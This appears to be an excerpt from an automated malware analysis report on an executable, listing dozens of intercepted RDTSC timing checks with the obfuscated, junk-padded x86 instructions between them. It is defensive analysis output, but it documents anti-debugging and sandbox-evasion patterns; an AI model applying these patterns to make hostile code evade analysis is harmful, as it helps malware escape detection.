Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0DF1 second address: 72A0E01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000001h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0E01 second address: 72A0E05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0E05 second address: 72A0E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0E0B second address: 72A0EBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b mov bl, al 0x0000000d pushfd 0x0000000e jmp 00007FC728ECBE19h 0x00000013 adc ecx, 7DA47E56h 0x00000019 jmp 00007FC728ECBE11h 0x0000001e popfd 0x0000001f popad 0x00000020 push eax 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007FC728ECBE17h 0x00000028 sub ecx, 38B92F8Eh 0x0000002e jmp 00007FC728ECBE19h 0x00000033 popfd 0x00000034 mov bx, cx 0x00000037 popad 0x00000038 nop 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c movsx edx, cx 0x0000003f pushfd 0x00000040 jmp 00007FC728ECBE10h 0x00000045 sub ax, 0D38h 0x0000004a jmp 00007FC728ECBE0Bh 0x0000004f popfd 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0EBB second address: 72A0EC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0EC0 second address: 72A0ED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 lea eax, dword ptr [ebp-18h] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC728ECBE0Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0FED second address: 72A0FF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0FF3 second address: 72A102A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, esi 0x0000000d pushad 0x0000000e call 00007FC728ECBE14h 0x00000013 mov edi, esi 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push ebx 0x00000019 pop esi 0x0000001a rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A102A second address: 72A1089 instructions: 0x00000000 rdtsc 0x00000002 mov edx, 6FCFF83Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esi+0Ch], eax 0x0000000d pushad 0x0000000e jmp 00007FC7292A9B11h 0x00000013 pushfd 0x00000014 jmp 00007FC7292A9B10h 0x00000019 sub eax, 447F0E88h 0x0000001f jmp 00007FC7292A9B0Bh 0x00000024 popfd 0x00000025 popad 0x00000026 mov edx, 762C06ECh 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FC7292A9B15h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A1089 second address: 72A10FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b jmp 00007FC728ECBE17h 0x00000010 lock cmpxchg dword ptr [edx], ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FC728ECBE0Bh 0x0000001d xor esi, 7065858Eh 0x00000023 jmp 00007FC728ECBE19h 0x00000028 popfd 0x00000029 call 00007FC728ECBE10h 0x0000002e pop eax 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A10FC second address: 72A1102 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A1102 second address: 72A1111 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A1111 second address: 72A1115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A1115 second address: 72A1119 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A1119 second address: 72A111F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A111F second address: 72A113C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC728ECBE19h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A113C second address: 72A1179 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d jmp 00007FC7292A9B0Eh 0x00000012 jne 00007FC79824807Fh 0x00000018 pushad 0x00000019 mov bx, ax 0x0000001c mov edx, esi 0x0000001e popad 0x0000001f mov edx, dword ptr [ebp+08h] 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A1179 second address: 72A117D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A117D second address: 72A1183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A1183 second address: 72A11B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, ah 0x00000005 mov bx, 2C96h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esi] 0x0000000e pushad 0x0000000f mov edx, 5E9D6D7Ah 0x00000014 popad 0x00000015 mov dword ptr [edx], eax 0x00000017 pushad 0x00000018 push edi 0x00000019 mov edx, ecx 0x0000001b pop eax 0x0000001c pushad 0x0000001d mov bl, 3Ch 0x0000001f movzx ecx, bx 0x00000022 popad 0x00000023 popad 0x00000024 mov eax, dword ptr [esi+04h] 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A11B0 second address: 72A11B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A11B4 second address: 72A11C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A11C6 second address: 72A11F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+04h], eax 0x0000000c jmp 00007FC7292A9B16h 0x00000011 mov eax, dword ptr [esi+08h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A11F7 second address: 72A11FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A11FB second address: 72A1201 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A1201 second address: 72A1207 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A1207 second address: 72A1232 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+08h], eax 0x0000000b jmp 00007FC7292A9B0Ah 0x00000010 mov eax, dword ptr [esi+0Ch] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jmp 00007FC7292A9B0Dh 0x0000001b mov ebx, esi 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A1232 second address: 72A1237 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A1237 second address: 72A128F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FC7292A9B19h 0x0000000a xor ax, C626h 0x0000000f jmp 00007FC7292A9B11h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov dword ptr [edx+0Ch], eax 0x0000001b jmp 00007FC7292A9B0Eh 0x00000020 mov eax, dword ptr [esi+10h] 0x00000023 pushad 0x00000024 push ecx 0x00000025 mov edi, 333DFFE0h 0x0000002a pop edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A128F second address: 72A1293 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A1293 second address: 72A12D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [edx+10h], eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FC7292A9B0Ah 0x00000011 sub al, 00000028h 0x00000014 jmp 00007FC7292A9B0Bh 0x00000019 popfd 0x0000001a mov edi, eax 0x0000001c popad 0x0000001d mov eax, dword ptr [esi+14h] 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FC7292A9B11h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A12D1 second address: 72A137F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, ECD2h 0x00000007 pushfd 0x00000008 jmp 00007FC728ECBE13h 0x0000000d or cl, FFFFFFCEh 0x00000010 jmp 00007FC728ECBE19h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [edx+14h], eax 0x0000001c pushad 0x0000001d jmp 00007FC728ECBE0Ch 0x00000022 pushfd 0x00000023 jmp 00007FC728ECBE12h 0x00000028 add si, 7478h 0x0000002d jmp 00007FC728ECBE0Bh 0x00000032 popfd 0x00000033 popad 0x00000034 mov eax, dword ptr [esi+18h] 0x00000037 pushad 0x00000038 push eax 0x00000039 pop eax 0x0000003a pushad 0x0000003b mov ah, bh 0x0000003d popad 0x0000003e popad 0x0000003f mov dword ptr [edx+18h], eax 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 movsx edi, si 0x00000048 pushfd 0x00000049 jmp 00007FC728ECBE16h 0x0000004e xor esi, 73D85938h 0x00000054 jmp 00007FC728ECBE0Bh 0x00000059 popfd 0x0000005a popad 0x0000005b rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A137F second address: 72A1385 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A1385 second address: 72A13F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+1Ch] 0x0000000b jmp 00007FC728ECBE17h 0x00000010 mov dword ptr [edx+1Ch], eax 0x00000013 pushad 0x00000014 mov cl, E7h 0x00000016 pushfd 0x00000017 jmp 00007FC728ECBE11h 0x0000001c adc esi, 5AA87136h 0x00000022 jmp 00007FC728ECBE11h 0x00000027 popfd 0x00000028 popad 0x00000029 mov eax, dword ptr [esi+20h] 0x0000002c pushad 0x0000002d mov eax, 1AE584C3h 0x00000032 popad 0x00000033 mov dword ptr [edx+20h], eax 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FC728ECBE11h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A13F8 second address: 72A13FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A13FE second address: 72A1402 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A1402 second address: 72A1425 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+24h] 0x0000000b jmp 00007FC7292A9B0Fh 0x00000010 mov dword ptr [edx+24h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A1425 second address: 72A1440 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A1440 second address: 72A149B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC7292A9B0Fh 0x00000009 and si, 69DEh 0x0000000e jmp 00007FC7292A9B19h 0x00000013 popfd 0x00000014 mov di, si 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [esi+28h] 0x0000001d pushad 0x0000001e push eax 0x0000001f pushad 0x00000020 popad 0x00000021 pop ebx 0x00000022 jmp 00007FC7292A9B12h 0x00000027 popad 0x00000028 mov dword ptr [edx+28h], eax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A149B second address: 72A14A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx ebx, si 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A14A3 second address: 72A14F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 mov esi, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ecx, dword ptr [esi+2Ch] 0x0000000d pushad 0x0000000e pushad 0x0000000f call 00007FC7292A9B15h 0x00000014 pop esi 0x00000015 call 00007FC7292A9B11h 0x0000001a pop eax 0x0000001b popad 0x0000001c push ebx 0x0000001d pushad 0x0000001e popad 0x0000001f pop esi 0x00000020 popad 0x00000021 mov dword ptr [edx+2Ch], ecx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FC7292A9B0Bh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A14F2 second address: 72A14F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A14F8 second address: 72A14FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A14FE second address: 72A1584 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ax, word ptr [esi+30h] 0x0000000c jmp 00007FC728ECBE0Ah 0x00000011 mov word ptr [edx+30h], ax 0x00000015 jmp 00007FC728ECBE10h 0x0000001a mov ax, word ptr [esi+32h] 0x0000001e pushad 0x0000001f pushad 0x00000020 call 00007FC728ECBE13h 0x00000025 pop ecx 0x00000026 mov bh, CCh 0x00000028 popad 0x00000029 popad 0x0000002a mov word ptr [edx+32h], ax 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 pushad 0x00000032 popad 0x00000033 pushfd 0x00000034 jmp 00007FC728ECBE13h 0x00000039 sub esi, 2F09042Eh 0x0000003f jmp 00007FC728ECBE19h 0x00000044 popfd 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A1584 second address: 72A159C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 mov cx, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+34h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov si, 8BFDh 0x00000015 push eax 0x00000016 pop edx 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A16CF second address: 72A16F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A16F3 second address: 72A16F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A16F7 second address: 72A16FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F0C2D second address: 72F0C64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FC7292A9B10h 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov al, B4h 0x00000015 mov esi, edi 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F0C64 second address: 72F0C94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE12h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC728ECBE17h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F0C94 second address: 72F0C9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F0C9A second address: 72F0D0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FC728ECBE14h 0x00000014 sub eax, 69771C28h 0x0000001a jmp 00007FC728ECBE0Bh 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007FC728ECBE18h 0x00000026 adc eax, 1E93CE88h 0x0000002c jmp 00007FC728ECBE0Bh 0x00000031 popfd 0x00000032 popad 0x00000033 pop ebp 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 mov ebx, 4D57A2F6h 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F0D0C second address: 72F0D11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F0D11 second address: 72F0D17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 729076E second address: 7290789 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7290789 second address: 729078F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 729078F second address: 7290793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7290793 second address: 72907D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a mov di, ax 0x0000000d mov ecx, 03560D15h 0x00000012 popad 0x00000013 mov dword ptr [esp], ebp 0x00000016 pushad 0x00000017 mov ebx, 0B1561D0h 0x0000001c popad 0x0000001d mov ebp, esp 0x0000001f jmp 00007FC728ECBE0Fh 0x00000024 pop ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FC728ECBE15h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7230044 second address: 7230097 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b movsx edi, cx 0x0000000e pushad 0x0000000f call 00007FC7292A9B16h 0x00000014 pop eax 0x00000015 mov bx, E5F6h 0x00000019 popad 0x0000001a popad 0x0000001b xchg eax, ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FC7292A9B18h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7230097 second address: 72300CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FC728ECBE11h 0x00000008 pop eax 0x00000009 mov si, bx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC728ECBE16h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72306B8 second address: 72306FE instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FC7292A9B18h 0x00000008 or esi, 289E1D38h 0x0000000e jmp 00007FC7292A9B0Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov ax, 776Fh 0x0000001a popad 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FC7292A9B0Ch 0x00000026 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72306FE second address: 7230704 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7230704 second address: 7230723 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, cx 0x00000006 mov ebx, ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC7292A9B11h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7230723 second address: 7230733 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC728ECBE0Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7230B68 second address: 7230B9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC7292A9B18h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7230B9A second address: 7230BA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7230BA0 second address: 7230BA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7230BA6 second address: 7230BAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7230BAA second address: 7230BE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B18h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC7292A9B17h 0x00000014 rdtsc
